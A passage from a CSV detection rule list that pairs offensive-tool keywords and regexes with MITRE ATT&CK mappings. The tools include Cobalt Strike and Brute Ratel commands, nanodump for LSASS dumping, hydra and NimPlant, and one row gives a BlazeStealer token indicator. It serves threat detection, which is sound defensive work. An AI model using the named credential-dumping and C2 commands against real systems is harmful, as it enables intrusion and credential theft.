and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "get-spns *","get\-spns\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "grab_token *","grab_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "http://tor2web.*","http\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "https://tor2web.*","https\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "https://transfer.sh/get/*/*.py*","https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading python scripts from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "https://www.nirsoft.net/utils/webcamimagesave.zip","https\:\/\/www\.nirsoft\.net\/utils\/webcamimagesave\.zip","offensive_tool_keyword","nirsoft","designed to capture webcam images","T1125 - T1056.004 - T1140","TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "hydra -*","hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "Impacket 
*","Impacket\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "impersonate *\*","impersonate\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "import boko*","import\sboko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "inceptor*dotnet*","inceptor.{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "kerberoast *","kerberoast\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "koh exit*","koh\sexit.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "koh list*","koh\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "Ladon *-* *","Ladon\s.{0,1000}\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon *.exe*","Ladon\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon */* *","Ladon\s.{0,1000}\/.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon Mac * ","Ladon\sMac\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Lapsdump *","Lapsdump\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "LdapSignCheck *","LdapSignCheck\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "ldeep *","ldeep\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "list_exports *.dll*","list_exports\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "load *.cna","load\s.{0,1000}\.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "masscan *","masscan\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "memdump *","memdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memex /*.exe*","memex\s\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - 
T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memhunt *","memhunt\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","MTE2NTc2MDM5MjY5NDM1NDA2MA\.GRSNK7\.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "na.exe *","na\.exe\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "nanodump*","nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "needle_sift *","needle_sift\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "net.recon *","net\.recon\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "nikto -*","nikto\s\-.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "nimplant","nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "nimplant *","nimplant\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "noclient-3.*","noclient\-3\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "onex install *","onex\sinstall\s.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. 
Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "polenum *:*","polenum\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "posh -u *","posh\s\-u\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - 